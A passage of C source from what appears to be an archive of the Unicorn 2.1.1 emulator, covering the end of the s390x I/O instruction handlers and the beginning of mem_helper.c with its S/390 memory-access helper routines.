ioinst_handle_chsc_unimplemented(res); break; } if (!s390_cpu_virt_mem_write(cpu, addr + len, reg, res, be16_to_cpu(res->len))) { setcc(cpu, 0); /* Command execution complete */ } else { s390_cpu_virt_mem_handle_exc(cpu, ra); } } #define SCHM_REG1_RES(_reg) (_reg & 0x000000000ffffffc) #define SCHM_REG1_MBK(_reg) ((_reg & 0x00000000f0000000) >> 28) #define SCHM_REG1_UPD(_reg) ((_reg & 0x0000000000000002) >> 1) #define SCHM_REG1_DCT(_reg) (_reg & 0x0000000000000001) void ioinst_handle_schm(S390CPU *cpu, uint64_t reg1, uint64_t reg2, uint32_t ipb, uintptr_t ra) { #if 0 uint8_t mbk; int update; int dct; CPUS390XState *env = &cpu->env; if (SCHM_REG1_RES(reg1)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } mbk = SCHM_REG1_MBK(reg1); update = SCHM_REG1_UPD(reg1); dct = SCHM_REG1_DCT(reg1); if (update && (reg2 & 0x000000000000001f)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } css_do_schm(mbk, update, dct, update ? reg2 : 0); #endif } void ioinst_handle_rsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("rsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_rsch(sch)); #endif } #define RCHP_REG1_RES(_reg) (_reg & 0x00000000ff00ff00) #define RCHP_REG1_CSSID(_reg) ((_reg & 0x0000000000ff0000) >> 16) #define RCHP_REG1_CHPID(_reg) (_reg & 0x00000000000000ff) void ioinst_handle_rchp(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cc; uint8_t cssid; uint8_t chpid; int ret; CPUS390XState *env = &cpu->env; if (RCHP_REG1_RES(reg1)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } cssid = RCHP_REG1_CSSID(reg1); chpid = RCHP_REG1_CHPID(reg1); ret = css_do_rchp(cssid, chpid); switch (ret) { case -ENODEV: cc = 3; break; case -EBUSY: cc = 2; break; case 0: cc = 0; break; default: /* Invalid channel subsystem. */ s390_program_interrupt(env, PGM_OPERAND, ra); return; } setcc(cpu, cc); #endif } #define SAL_REG1_INVALID(_reg) (_reg & 0x0000000080000000) void ioinst_handle_sal(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { /* We do not provide address limit checking, so let's suppress it. */ if (SAL_REG1_INVALID(reg1) || reg1 & 0x000000000000ffff) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/mem_helper.c��������������������������������������������������������0000664�0000000�0000000�00000246547�14675241067�0020632�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 memory access helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/int128.h" #include "qemu/atomic128.h" #include "tcg/tcg.h" #include "hw/s390x/storage-keys.h" /*****************************************************************************/ /* Softmmu support */ /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif static inline bool psw_key_valid(CPUS390XState *env, uint8_t psw_key) { uint16_t pkm = env->cregs[3] >> 16; if (env->psw.mask & PSW_MASK_PSTATE) { /* PSW key has range 0..15, it is valid if the bit is 1 in the PKM */ return pkm & (0x80 >> psw_key); } return true; } static bool is_destructive_overlap(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t len) { if (!len || src == dest) { return false; } /* Take care of wrapping at the end of address space. */ if (unlikely(wrap_address(env, src + len - 1) < src)) { return dest > src || dest <= wrap_address(env, src + len - 1); } return dest > src && dest <= src + len - 1; } /* Trigger a SPECIFICATION exception if an address or a length is not naturally aligned. */ static inline void check_alignment(CPUS390XState *env, uint64_t v, int wordsize, uintptr_t ra) { if (v % wordsize) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } } /* Load a value from memory according to its size. */ static inline uint64_t cpu_ldusize_data_ra(CPUS390XState *env, uint64_t addr, int wordsize, uintptr_t ra) { switch (wordsize) { case 1: return cpu_ldub_data_ra(env, addr, ra); case 2: return cpu_lduw_data_ra(env, addr, ra); default: abort(); } } /* Store a to memory according to its size. */ static inline void cpu_stsize_data_ra(CPUS390XState *env, uint64_t addr, uint64_t value, int wordsize, uintptr_t ra) { switch (wordsize) { case 1: cpu_stb_data_ra(env, addr, value, ra); break; case 2: cpu_stw_data_ra(env, addr, value, ra); break; default: abort(); } } /* An access covers at most 4096 bytes and therefore at most two pages. */ typedef struct S390Access { target_ulong vaddr1; target_ulong vaddr2; char *haddr1; char *haddr2; uint16_t size1; uint16_t size2; /* * If we can't access the host page directly, we'll have to do I/O access * via ld/st helpers. These are internal details, so we store the * mmu idx to do the access here instead of passing it around in the * helpers. Maybe, one day we can get rid of ld/st access - once we can * handle TLB_NOTDIRTY differently. We don't expect these special accesses * to trigger exceptions - only if we would have TLB_NOTDIRTY on LAP * pages, we might trigger a new MMU translation - very unlikely that * the mapping changes in between and we would trigger a fault. */ int mmu_idx; } S390Access; static S390Access access_prepare(CPUS390XState *env, vaddr vaddr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t ra) { S390Access access = { .vaddr1 = vaddr, .size1 = MIN(size, -(vaddr | TARGET_PAGE_MASK)), .mmu_idx = mmu_idx, }; g_assert(size > 0 && size <= 4096); access.haddr1 = probe_access(env, access.vaddr1, access.size1, access_type, mmu_idx, ra); if (unlikely(access.size1 != size)) { /* The access crosses page boundaries. */ access.vaddr2 = wrap_address(env, vaddr + access.size1); access.size2 = size - access.size1; access.haddr2 = probe_access(env, access.vaddr2, access.size2, access_type, mmu_idx, ra); } return access; } /* Helper to handle memset on a single page. */ static void do_access_memset(CPUS390XState *env, vaddr vaddr, char *haddr, uint8_t byte, uint16_t size, int mmu_idx, uintptr_t ra) { TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); int i; if (likely(haddr)) { memset(haddr, byte, size); } else { /* * Do a single access and test if we can then get access to the * page. This is especially relevant to speed up TLB_NOTDIRTY. */ g_assert(size > 0); helper_ret_stb_mmu(env, vaddr, byte, oi, ra); haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_STORE, mmu_idx); if (likely(haddr)) { memset(haddr + 1, byte, size - 1); } else { for (i = 1; i < size; i++) { helper_ret_stb_mmu(env, vaddr + i, byte, oi, ra); } } } } static void access_memset(CPUS390XState *env, S390Access *desta, uint8_t byte, uintptr_t ra) { do_access_memset(env, desta->vaddr1, desta->haddr1, byte, desta->size1, desta->mmu_idx, ra); if (likely(!desta->size2)) { return; } do_access_memset(env, desta->vaddr2, desta->haddr2, byte, desta->size2, desta->mmu_idx, ra); } static uint8_t do_access_get_byte(CPUS390XState *env, vaddr vaddr, char **haddr, int offset, int mmu_idx, uintptr_t ra) { TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); uint8_t byte; if (likely(*haddr)) { return ldub_p(*haddr + offset); } /* * Do a single access and test if we can then get access to the * page. This is especially relevant to speed up TLB_NOTDIRTY. */ byte = helper_ret_ldub_mmu(env, vaddr + offset, oi, ra); *haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_LOAD, mmu_idx); return byte; } static uint8_t access_get_byte(CPUS390XState *env, S390Access *access, int offset, uintptr_t ra) { if (offset < access->size1) { return do_access_get_byte(env, access->vaddr1, &access->haddr1, offset, access->mmu_idx, ra); } return do_access_get_byte(env, access->vaddr2, &access->haddr2, offset - access->size1, access->mmu_idx, ra); } static void do_access_set_byte(CPUS390XState *env, vaddr vaddr, char **haddr, int offset, uint8_t byte, int mmu_idx, uintptr_t ra) { TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); if (likely(*haddr)) { stb_p(*haddr + offset, byte); return; } /* * Do a single access and test if we can then get access to the * page. This is especially relevant to speed up TLB_NOTDIRTY. */ helper_ret_stb_mmu(env, vaddr + offset, byte, oi, ra); *haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_STORE, mmu_idx); } static void access_set_byte(CPUS390XState *env, S390Access *access, int offset, uint8_t byte, uintptr_t ra) { if (offset < access->size1) { do_access_set_byte(env, access->vaddr1, &access->haddr1, offset, byte, access->mmu_idx, ra); } else { do_access_set_byte(env, access->vaddr2, &access->haddr2, offset - access->size1, byte, access->mmu_idx, ra); } } /* * Move data with the same semantics as memmove() in case ranges don't overlap * or src > dest. Undefined behavior on destructive overlaps. */ static void access_memmove(CPUS390XState *env, S390Access *desta, S390Access *srca, uintptr_t ra) { int diff; g_assert(desta->size1 + desta->size2 == srca->size1 + srca->size2); /* Fallback to slow access in case we don't have access to all host pages */ if (unlikely(!desta->haddr1 || (desta->size2 && !desta->haddr2) || !srca->haddr1 || (srca->size2 && !srca->haddr2))) { int i; for (i = 0; i < desta->size1 + desta->size2; i++) { uint8_t byte = access_get_byte(env, srca, i, ra); access_set_byte(env, desta, i, byte, ra); } return; } if (srca->size1 == desta->size1) { memmove(desta->haddr1, srca->haddr1, srca->size1); if (unlikely(srca->size2)) { memmove(desta->haddr2, srca->haddr2, srca->size2); } } else if (srca->size1 < desta->size1) { diff = desta->size1 - srca->size1; memmove(desta->haddr1, srca->haddr1, srca->size1); memmove(desta->haddr1 + srca->size1, srca->haddr2, diff); if (likely(desta->size2)) { memmove(desta->haddr2, srca->haddr2 + diff, desta->size2); } } else { diff = srca->size1 - desta->size1; memmove(desta->haddr1, srca->haddr1, desta->size1); memmove(desta->haddr2, srca->haddr1 + desta->size1, diff); if (likely(srca->size2)) { memmove(desta->haddr2 + diff, srca->haddr2, srca->size2); } } } static int mmu_idx_from_as(uint8_t as) { switch (as) { case AS_PRIMARY: return MMU_PRIMARY_IDX; case AS_SECONDARY: return MMU_SECONDARY_IDX; case AS_HOME: return MMU_HOME_IDX; default: /* FIXME AS_ACCREG */ g_assert_not_reached(); } } /* and on array */ static uint32_t do_helper_nc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* NC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca1, i, ra) & access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(nc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_nc(env, l, dest, src, GETPC()); } /* xor on array */ static uint32_t do_helper_xc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* XC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); /* xor with itself is the same as memset(0) */ if (src == dest) { access_memset(env, &desta, 0, ra); return 0; } for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca1, i, ra) ^ access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(xc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_xc(env, l, dest, src, GETPC()); } /* or on array */ static uint32_t do_helper_oc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* OC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca1, i, ra) | access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(oc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_oc(env, l, dest, src, GETPC()); } /* memmove */ static uint32_t do_helper_mvc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca, desta; uint32_t i; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* MVC always copies one more byte than specified - maximum is 256 */ l++; srca = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); /* * "When the operands overlap, the result is obtained as if the operands * were processed one byte at a time". Only non-destructive overlaps * behave like memmove(). */ if (dest == src + 1) { access_memset(env, &desta, access_get_byte(env, &srca, 0, ra), ra); } else if (!is_destructive_overlap(env, dest, src, l)) { access_memmove(env, &desta, &srca, ra); } else { for (i = 0; i < l; i++) { uint8_t byte = access_get_byte(env, &srca, i, ra); access_set_byte(env, &desta, i, byte, ra); } } return env->cc_op; } void HELPER(mvc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { do_helper_mvc(env, l, dest, src, GETPC()); } /* move inverse */ void HELPER(mvcin)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca, desta; uintptr_t ra = GETPC(); int i; /* MVCIN always copies one more byte than specified - maximum is 256 */ l++; src = wrap_address(env, src - l + 1); srca = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca, l - i - 1, ra); access_set_byte(env, &desta, i, x, ra); } } /* move numerics */ void HELPER(mvn)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uintptr_t ra = GETPC(); int i; /* MVN always copies one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = (access_get_byte(env, &srca1, i, ra) & 0x0f) | (access_get_byte(env, &srca2, i, ra) & 0xf0); access_set_byte(env, &desta, i, x, ra); } } /* move with offset */ void HELPER(mvo)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); /* MVO always processes one more byte than specified - maximum is 16 */ const int len_dest = (l >> 4) + 1; const int len_src = (l & 0xf) + 1; uintptr_t ra = GETPC(); uint8_t byte_dest, byte_src; S390Access srca, desta; int i, j; srca = access_prepare(env, src, len_src, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, len_dest, MMU_DATA_STORE, mmu_idx, ra); /* Handle rightmost byte */ byte_dest = cpu_ldub_data_ra(env, dest + len_dest - 1, ra); byte_src = access_get_byte(env, &srca, len_src - 1, ra); byte_dest = (byte_dest & 0x0f) | (byte_src << 4); access_set_byte(env, &desta, len_dest - 1, byte_dest, ra); /* Process remaining bytes from right to left */ for (i = len_dest - 2, j = len_src - 2; i >= 0; i--, j--) { byte_dest = byte_src >> 4; if (j >= 0) { byte_src = access_get_byte(env, &srca, j, ra); } else { byte_src = 0; } byte_dest |= byte_src << 4; access_set_byte(env, &desta, i, byte_dest, ra); } } /* move zones */ void HELPER(mvz)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uintptr_t ra = GETPC(); int i; /* MVZ always copies one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = (access_get_byte(env, &srca1, i, ra) & 0xf0) | (access_get_byte(env, &srca2, i, ra) & 0x0f); access_set_byte(env, &desta, i, x, ra); } } /* compare unsigned byte arrays */ static uint32_t do_helper_clc(CPUS390XState *env, uint32_t l, uint64_t s1, uint64_t s2, uintptr_t ra) { uint32_t i; uint32_t cc = 0; HELPER_LOG("%s l %d s1 %" PRIx64 " s2 %" PRIx64 "\n", __func__, l, s1, s2); for (i = 0; i <= l; i++) { uint8_t x = cpu_ldub_data_ra(env, s1 + i, ra); uint8_t y = cpu_ldub_data_ra(env, s2 + i, ra); HELPER_LOG("%02x (%c)/%02x (%c) ", x, x, y, y); if (x < y) { cc = 1; break; } else if (x > y) { cc = 2; break; } } HELPER_LOG("\n"); return cc; } uint32_t HELPER(clc)(CPUS390XState *env, uint32_t l, uint64_t s1, uint64_t s2) { return do_helper_clc(env, l, s1, s2, GETPC()); } /* compare logical under mask */ uint32_t HELPER(clm)(CPUS390XState *env, uint32_t r1, uint32_t mask, uint64_t addr) { uintptr_t ra = GETPC(); uint32_t cc = 0; HELPER_LOG("%s: r1 0x%x mask 0x%x addr 0x%" PRIx64 "\n", __func__, r1, mask, addr); while (mask) { if (mask & 8) { uint8_t d = cpu_ldub_data_ra(env, addr, ra); uint8_t r = extract32(r1, 24, 8); HELPER_LOG("mask 0x%x %02x/%02x (0x%" PRIx64 ") ", mask, r, d, addr); if (r < d) { cc = 1; break; } else if (r > d) { cc = 2; break; } addr++; } mask = (mask << 1) & 0xf; r1 <<= 8; } HELPER_LOG("\n"); return cc; } static inline uint64_t get_address(CPUS390XState *env, int reg) { return wrap_address(env, env->regs[reg]); } /* * Store the address to the given register, zeroing out unused leftmost * bits in bit positions 32-63 (24-bit and 31-bit mode only). */ static inline void set_address_zero(CPUS390XState *env, int reg, uint64_t address) { if (env->psw.mask & PSW_MASK_64) { env->regs[reg] = address; } else { if (!(env->psw.mask & PSW_MASK_32)) { address &= 0x00ffffff; } else { address &= 0x7fffffff; } env->regs[reg] = deposit64(env->regs[reg], 0, 32, address); } } static inline void set_address(CPUS390XState *env, int reg, uint64_t address) { if (env->psw.mask & PSW_MASK_64) { /* 64-Bit mode */ env->regs[reg] = address; } else { if (!(env->psw.mask & PSW_MASK_32)) { /* 24-Bit mode. According to the PoO it is implementation dependent if bits 32-39 remain unchanged or are set to zeros. Choose the former so that the function can also be used for TRT. */ env->regs[reg] = deposit64(env->regs[reg], 0, 24, address); } else { /* 31-Bit mode. According to the PoO it is implementation dependent if bit 32 remains unchanged or is set to zero. Choose the latter so that the function can also be used for TRT. */ address &= 0x7fffffff; env->regs[reg] = deposit64(env->regs[reg], 0, 32, address); } } } static inline uint64_t wrap_length32(CPUS390XState *env, uint64_t length) { if (!(env->psw.mask & PSW_MASK_64)) { return (uint32_t)length; } return length; } static inline uint64_t wrap_length31(CPUS390XState *env, uint64_t length) { if (!(env->psw.mask & PSW_MASK_64)) { /* 24-Bit and 31-Bit mode */ length &= 0x7fffffff; } return length; } static inline uint64_t get_length(CPUS390XState *env, int reg) { return wrap_length31(env, env->regs[reg]); } static inline void set_length(CPUS390XState *env, int reg, uint64_t length) { if (env->psw.mask & PSW_MASK_64) { /* 64-Bit mode */ env->regs[reg] = length; } else { /* 24-Bit and 31-Bit mode */ env->regs[reg] = deposit64(env->regs[reg], 0, 32, length); } } /* search string (c is byte to search, r2 is string, r1 end of string) */ void HELPER(srst)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint64_t end, str; uint32_t len; uint8_t v, c = env->regs[0]; /* Bits 32-55 must contain all 0. */ if (env->regs[0] & 0xffffff00u) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } str = get_address(env, r2); end = get_address(env, r1); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; ++len) { if (str + len == end) { /* Character not found. R1 & R2 are unmodified. */ env->cc_op = 2; return; } v = cpu_ldub_data_ra(env, str + len, ra); if (v == c) { /* Character found. Set R1 to the location; R2 is unmodified. */ env->cc_op = 1; set_address(env, r1, str + len); return; } } /* CPU-determined bytes processed. Advance R2 to next byte to process. */ env->cc_op = 3; set_address(env, r2, str + len); } void HELPER(srstu)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint32_t len; uint16_t v, c = env->regs[0]; uint64_t end, str, adj_end; /* Bits 32-47 of R0 must be zero. */ if (env->regs[0] & 0xffff0000u) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } str = get_address(env, r2); end = get_address(env, r1); /* If the LSB of the two addresses differ, use one extra byte. */ adj_end = end + ((str ^ end) & 1); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; len += 2) { if (str + len == adj_end) { /* End of input found. */ env->cc_op = 2; return; } v = cpu_lduw_data_ra(env, str + len, ra); if (v == c) { /* Character found. Set R1 to the location; R2 is unmodified. */ env->cc_op = 1; set_address(env, r1, str + len); return; } } /* CPU-determined bytes processed. Advance R2 to next byte to process. */ env->cc_op = 3; set_address(env, r2, str + len); } /* unsigned string compare (c is string terminator) */ uint64_t HELPER(clst)(CPUS390XState *env, uint64_t c, uint64_t s1, uint64_t s2) { uintptr_t ra = GETPC(); uint32_t len; c = c & 0xff; s1 = wrap_address(env, s1); s2 = wrap_address(env, s2); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; ++len) { uint8_t v1 = cpu_ldub_data_ra(env, s1 + len, ra); uint8_t v2 = cpu_ldub_data_ra(env, s2 + len, ra); if (v1 == v2) { if (v1 == c) { /* Equal. CC=0, and don't advance the registers. */ env->cc_op = 0; env->retxl = s2; return s1; } } else { /* Unequal. CC={1,2}, and advance the registers. Note that the terminator need not be zero, but the string that contains the terminator is by definition "low". */ env->cc_op = (v1 == c ? 1 : v2 == c ? 2 : v1 < v2 ? 1 : 2); env->retxl = s2 + len; return s1 + len; } } /* CPU-determined bytes equal; advance the registers. */ env->cc_op = 3; env->retxl = s2 + len; return s1 + len; } /* move page */ uint32_t HELPER(mvpg)(CPUS390XState *env, uint64_t r0, uint64_t r1, uint64_t r2) { const int mmu_idx = cpu_mmu_index(env, false); const bool f = extract64(r0, 11, 1); const bool s = extract64(r0, 10, 1); uintptr_t ra = GETPC(); S390Access srca, desta; if ((f && s) || extract64(r0, 12, 4)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } r1 = wrap_address(env, r1 & TARGET_PAGE_MASK); r2 = wrap_address(env, r2 & TARGET_PAGE_MASK); /* * TODO: * - Access key handling * - CC-option with surpression of page-translation exceptions * - Store r1/r2 register identifiers at real location 162 */ srca = access_prepare(env, r2, TARGET_PAGE_SIZE, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, r1, TARGET_PAGE_SIZE, MMU_DATA_STORE, mmu_idx, ra); access_memmove(env, &desta, &srca, ra); return 0; /* data moved */ } /* string copy */ uint32_t HELPER(mvst)(CPUS390XState *env, uint32_t r1, uint32_t r2) { const int mmu_idx = cpu_mmu_index(env, false); const uint64_t d = get_address(env, r1); const uint64_t s = get_address(env, r2); const uint8_t c = env->regs[0]; const int len = MIN(-(d | TARGET_PAGE_MASK), -(s | TARGET_PAGE_MASK)); S390Access srca, desta; uintptr_t ra = GETPC(); int i; if (env->regs[0] & 0xffffff00ull) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } /* * Our access should not exceed single pages, as we must not report access * exceptions exceeding the actually copied range (which we don't know at * this point). We might over-indicate watchpoints within the pages * (if we ever care, we have to limit processing to a single byte). */ srca = access_prepare(env, s, len, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, d, len, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < len; i++) { const uint8_t v = access_get_byte(env, &srca, i, ra); access_set_byte(env, &desta, i, v, ra); if (v == c) { set_address_zero(env, r1, d + i); return 1; } } set_address_zero(env, r1, d + len); set_address_zero(env, r2, s + len); return 3; } /* load access registers r1 to r3 from memory at a2 */ void HELPER(lam)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); int i; if (a2 & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { env->aregs[i] = cpu_ldl_data_ra(env, a2, ra); a2 += 4; if (i == r3) { break; } } } /* store access registers r1 to r3 in memory at a2 */ void HELPER(stam)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); int i; if (a2 & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { cpu_stl_data_ra(env, a2, env->aregs[i], ra); a2 += 4; if (i == r3) { break; } } } /* move long helper */ static inline uint32_t do_mvcl(CPUS390XState *env, uint64_t *dest, uint64_t *destlen, uint64_t *src, uint64_t *srclen, uint16_t pad, int wordsize, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); int len = MIN(*destlen, -(*dest | TARGET_PAGE_MASK)); S390Access srca, desta; int i, cc; if (*destlen == *srclen) { cc = 0; } else if (*destlen < *srclen) { cc = 1; } else { cc = 2; } if (!*destlen) { return cc; } /* * Only perform one type of type of operation (move/pad) at a time. * Stay within single pages. */ if (*srclen) { /* Copy the src array */ len = MIN(MIN(*srclen, -(*src | TARGET_PAGE_MASK)), len); *destlen -= len; *srclen -= len; srca = access_prepare(env, *src, len, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra); access_memmove(env, &desta, &srca, ra); *src = wrap_address(env, *src + len); *dest = wrap_address(env, *dest + len); } else if (wordsize == 1) { /* Pad the remaining area */ *destlen -= len; desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra); access_memset(env, &desta, pad, ra); *dest = wrap_address(env, *dest + len); } else { desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra); /* The remaining length selects the padding byte. */ for (i = 0; i < len; (*destlen)--, i++) { if (*destlen & 1) { access_set_byte(env, &desta, i, pad, ra); } else { access_set_byte(env, &desta, i, pad >> 8, ra); } } *dest = wrap_address(env, *dest + len); } return *destlen ? 3 : cc; } /* move long */ uint32_t HELPER(mvcl)(CPUS390XState *env, uint32_t r1, uint32_t r2) { const int mmu_idx = cpu_mmu_index(env, false); uintptr_t ra = GETPC(); uint64_t destlen = env->regs[r1 + 1] & 0xffffff; uint64_t dest = get_address(env, r1); uint64_t srclen = env->regs[r2 + 1] & 0xffffff; uint64_t src = get_address(env, r2); uint8_t pad = env->regs[r2 + 1] >> 24; CPUState *cs = env_cpu(env); S390Access srca, desta; uint32_t cc, cur_len; if (is_destructive_overlap(env, dest, src, MIN(srclen, destlen))) { cc = 3; } else if (srclen == destlen) { cc = 0; } else if (destlen < srclen) { cc = 1; } else { cc = 2; } /* We might have to zero-out some bits even if there was no action. */ if (unlikely(!destlen || cc == 3)) { set_address_zero(env, r2, src); set_address_zero(env, r1, dest); return cc; } else if (!srclen) { set_address_zero(env, r2, src); } /* * Only perform one type of type of operation (move/pad) in one step. * Stay within single pages. */ while (destlen) { cur_len = MIN(destlen, -(dest | TARGET_PAGE_MASK)); if (!srclen) { desta = access_prepare(env, dest, cur_len, MMU_DATA_STORE, mmu_idx, ra); access_memset(env, &desta, pad, ra); } else { cur_len = MIN(MIN(srclen, -(src | TARGET_PAGE_MASK)), cur_len); srca = access_prepare(env, src, cur_len, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, cur_len, MMU_DATA_STORE, mmu_idx, 